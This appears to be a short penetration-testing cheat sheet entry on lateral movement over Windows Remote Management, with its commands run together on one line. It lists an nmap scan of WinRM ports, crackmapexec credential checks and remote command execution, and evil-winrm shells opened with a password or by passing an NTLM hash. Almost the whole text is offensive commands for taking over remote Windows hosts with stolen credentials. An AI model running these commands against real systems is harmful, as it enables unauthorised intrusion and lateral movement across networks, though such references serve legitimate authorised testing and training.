Windows Remote Management — the preferred lateral movement path. Evil-WinRM for shells.
nmap -p5985,5986 -sV $tcrackmapexec winrm $t -u <user> -p <pass>evil-winrm -i $t -u <user> -p <pass>evil-winrm -i $t -u <user> -H <ntlmhash>crackmapexec winrm $t -u <user> -p <pass> -x 'whoami'